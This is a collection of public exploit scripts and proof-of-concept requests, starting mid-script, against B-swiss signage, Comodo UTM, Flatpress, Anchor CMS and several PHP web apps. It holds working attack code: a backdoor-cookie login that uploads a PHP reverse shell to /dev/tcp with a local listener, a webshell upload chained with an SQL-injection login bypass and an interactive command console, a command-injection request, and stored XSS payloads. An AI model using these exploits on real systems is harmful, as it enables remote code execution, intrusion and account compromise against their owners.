b"\x44\x50\x36\x25\x57\x33\x64" self.agent = "SignageBot/1.02" self.fileid = "251" self.payload = None self.answer = False self.params = None self.rhost = None self.lhost = None self.lport = None self.send = None def env(self): if len(sys.argv) != 4: self.usage() else: self.rhost = sys.argv[1] self.lhost = sys.argv[2] self.lport = int(sys.argv[3]) if not "http" in self.rhost: self.rhost = "http://{}".format(self.rhost) def usage(self): self.roger() print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0])) print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0])) exit(0) def roger(self): waddup = """ ____________________ / \\ ! B-swiss 3 ! ! RCE ! \____________________/ ! ! ! ! L_ ! / _)! / /__L ____________/ (____) (____) ____________ (____) \_(____) ! ! ! ! \__/ """ print(waddup) def test(self): print("[*] Checking target...") try: r = requests.get(self.rhost) response = r.text if not "B-swiss" in response: print("[!] Not a b-swiss system") exit(0) if "B-swiss" in response: print("[*] Good to go!") next else: exit(-251) except Exception as e: print("[!] Ney ney: {msg}".format(msg=e)) exit(-1) def login(self): token = "" cj = CookieJar() self.params = {"locator" : "visitor.ProcessLogin", "username" : self.username, "password" : self.password, "x" : "0", "y" : "0"} damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) damato.addheaders.pop() damato.addheaders.append(("User-Agent", self.agent)) try: print("[*] Getting backdoor session...") damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8')) for cookie in cj: token = cookie.value print("[*] Got master backdoor cookie: "+token) except urllib.request.URLError as e: print("[!] Connection error: {}".format(e.reason)) return token def upload(self): j = "\r\n" self.cookies = {"PNU_RAD_LIB" : self.rtoken} self.headers = {"Cache-Control" : "max-age=0", "Content-Type" : "multipart/form-data; boundary=----j", "User-Agent" : self.agent, "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9", "Connection" : "close"} self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");" print("[*] Adding GUI credentials: test:123456") # rec_adminlevel values: # ---------------------- # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege) # 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+ # 8 - Other | # | self.send = "------j{}Content-Disposition: form-data; ".format(j)# | self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# | self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# | self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+ self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2) self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j) self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j) requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send) print("[*] Executing and deleting stager file") r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php") sleep(1) self.answer = input("[?] Want me to remove the GUI credentials? ").strip() if self.answer[0] == "y" or self.answer[0] == "Y": print("[*] Removing...") requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies) if self.answer[0] == "n" or self.answer[0] == "N": print("[*] Cool!") print("[*] t00t!") exit(-1) def razmisluju(self): print("[*] Starting callback listener child thread") konac = threading.Thread(name="ZSL", target=self.phone) konac.start() sleep(1) self.upload() def fish(self): r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False) response = r.text print("[*] Checking for previous attempts...") if not ".php" in response: print("[*] All good.") elif "251.php" in response: print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid)) def phone(self): telnetus = telnetlib.Telnet() print("[*] Starting handler on port {}".format(self.lport)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) while True: try: s.settimeout(7) s.listen(1) conn, addr = s.accept() print("[*] Connection from {}:{}".format(addr[0], addr[1])) telnetus.sock = conn except socket.timeout as p: print("[!] No outgoing calls :( ({msg})".format(msg=p)) print("[+] Check your port mappings or increase timeout") s.close() exit(0) break print("[*] You got shell!") telnetus.interact() conn.close() def main(self): self.env() self.test() self.fish() self.rtoken = self.login() self.razmisluju() if __name__ == '__main__': Sign().main()

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution # Date: 2018-08-15 # Exploit Author: Milad Fadavvi # Author's LinkedIn: https://www.linkedin.com/in/fadavvi/ # Vendor Homepage: https://www.comodo.com/ # Version: Releases before 2.7.0 & 1.5.0 # Tested on: Windows=Firefox/chrome - Kali=firefox # PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC # CVE : CVE-2018-17431 # CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431 # CVSS 3 score: 9.8 import requests def RndInt(Lenght): from random import choice from string import digits RandonInt = ''.join([choice(digits) for n in range(Lenght)]) return str(RandonInt) if __name__ == "__main__": IP = input("IP: ") Port = input("Port: ") Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH '''For more info about command try to read manual of spesefic version of Comodo UTM and exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC) ''' BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2) BaseNComdURL = BaseURL + "&k=" + Command LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) FullURL = BaseNComdURL + LastPart AddetionalEnter = BaseURL + "&k=%0a" + LastPart try: FirstResponse = requests.get(FullURL).text except: print('\nExploit failed due HTTP Error. Check given URL and Port!\n') exit(1) SecondResponse = requests.get(AddetionalEnter).text if SecondResponse.find("Configuration has been altered") == -1: print("\nExploit Failed!\n") exit(1) else: print("\nOK! Command Ran!\n") exit(0)

# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting # Date: 2020-09-19 # Exploit Author: Alperen Ergel # Vendor Homepage: https://www.flatpress.org/ # Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3 # Version: 1.0.3 # Tested on: windows 10 / xampp # CVE : CVE-2020-35241 # Proof Of Content POST /flatpress/admin.php?p=entry&action=write HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://localhost/ Connection: close Referer: http://localhost/flatpress/admin.php?p=entry&action=write Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1 Upgrade-Insecure-Requests: 1 _wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382& entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue # Snipp content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>

# Title: Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: N/A # Description: The file myform.php does not perform input validation on the request paramters. An attacker can inject javascript payloads in the parameters to perform various attacks suchs as stealing of cookies,sensitive information etc. import requests, sys, urllib, re from lxml import etree from io import StringIO from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) import random import string def print_usage(STRING): return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET if __name__ == "__main__": if len(sys.argv) != 2: print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0]) print print_usage("Example:\t python %s 'https://192.168.1.72:443/visitor_management/'" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] XSS_DIR = '/myform.php' XSS_URL = SERVER_URL + XSS_DIR XSS_PoC_URL = SERVER_URL + '/front.php' s = requests.Session() s.get(SERVER_URL, verify=False) payload = {'name': 'd3crypt','cno':'9876543210','purpose':'stored xss','MeetingTo':'Hack','comment':'<script>alert("xss")</script>','submit_post':'Submit','mydata':''} r1 = s.post(url=XSS_URL, data=payload, verify=False) r2 = s.get(XSS_PoC_URL, allow_redirects=False, verify=False) response_page = r2.content.decode("utf-8") parser = etree.HTMLParser() tree = etree.parse(StringIO(response_page), parser=parser) def get_links(tree): refs = tree.xpath("//a") links = [link.get('data-content', '') for link in refs] return [l for l in links] visitors = get_links(tree) #print(visitors) for visitor in visitors: if 'stored xss' in visitor: rid=visitor.split(':')[6].strip() print print_usage('Make the logged-in user click this URL: ' + XSS_PoC_URL + '?rid=' + rid)

# Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated) # Google Dork: N/A # Date: 2020-09-22 # Exploit Author: Eren 'Aporlorxl23' Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip # Version: 1.0 # Tested on: Linux - XAMPP Server # CVE : N/A # Vulnerable Source Code: # /view_prod.php # [3] $qry = $conn->query("SELECT * FROM product_list where id = ".$_GET['id'])->fetch_array(); # PoC: # Request: GET /view_prod.php?id=' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: tr,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close # Response: HTTP/1.1 200 OK Date: Tue, 22 Sep 2020 20:44:48 GMT Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3 X-Powered-By: PHP/7.4.7 Content-Length: 234 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught Error: Call to a member function fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3 Stack trace: #0 {main} thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br /> # As You Can See Here PHP Fatal Error Because # $qry = $conn->query("SELECT * FROM product_list where id = "')->fetch_array(); # id Value ' This is Wrong Syntax. # Recommended Fix: You Will Use `mysqli_real_escape_string` On id . And query Will Same With : $qry = $conn->query('SELECT * FROM product_list where id ="$_GET['id']"')->fetch_array(); Because Here Not Used "" This is Imported.

# Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution # Google Dork: N/A # Date: 2020-09-22 # Exploit Author: Eren Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip # Version: 1.0 # Tested on: Windows/Linux - XAMPP Server # CVE : N/A # Setup: pip3 install bs4 . # Exploit Code : import requests,sys,string,random from bs4 import BeautifulSoup def get_random_string(length): letters = string.ascii_lowercase result_str = ''.join(random.choice(letters) for i in range(length)) return result_str session = requests.session() Domain = "" RandomFileName = get_random_string(5)+".php" def Help(): print("[?] Usage: python AporlorRCE.py <Domain>") def Upload(): session = requests.session() burp0_url = Domain+"/admin/ajax.php?action=save_menu" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"} burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n" try: Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data) if Resp == "1": print("[+] Shell Upload Success") else: print("[-] Shell Upload Failed") except: print("[-] Request Failed") Help() def Login(): burp0_url = Domain+"/admin/ajax.php?action=login" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"} try: Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data) if Resp.text == "1": print("[+] Login Success") else: print("[+] Login Failed") except: print("[-] Request Failed") Help() def FoundMyRCE(): global FileName burp0_url = Domain+"/admin/index.php?page=menu" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} try: Resp = session.get(burp0_url, headers=burp0_headers) Soup = BeautifulSoup(Resp.text, "html5lib") Data = Soup.find_all("img") for MyRCE in Data: if RandomFileName in MyRCE["src"]: FileName = MyRCE["src"].strip("../assets/img/") print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/")) except: print("[-] Request Failed") Help() def Terminal(): while True: Command = input("Console: ") burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command try: Resp = session.get(burp0_url) print(Resp.text) except KeyboardInterrupt: print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23") except: print("[-] Request Error") if __name__ == "__main__": if len(sys.argv) == 2: Domain = sys.argv[1] Login() Upload() FoundMyRCE() Terminal() else: Help()

# Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated) # Date: 2020-09-24 # Exploit Author: Sinem Şahin # Vendor Homepage: https://anchorcms.com/ # Version: 0.12.7 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/admin/ 2- Login to admin panel. 3- Press "Posts" button. 4- Write XSS Payload into the description of the post. 5- Press "Save" button. 6- Go to the post. XSS Payload ==> "><script>alert("XSS")</script> ==> HTTP Request <== POST /admin/posts/edit/1 HTTP/1.1 Host: (HOST) Content-Length: 262 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept: / Origin: http://(HOST)/ Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://(HOST)/admin/posts/edit/1 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: anchorcms=21cdfqefqwefl69ij8231 Connection: close token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10 &description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false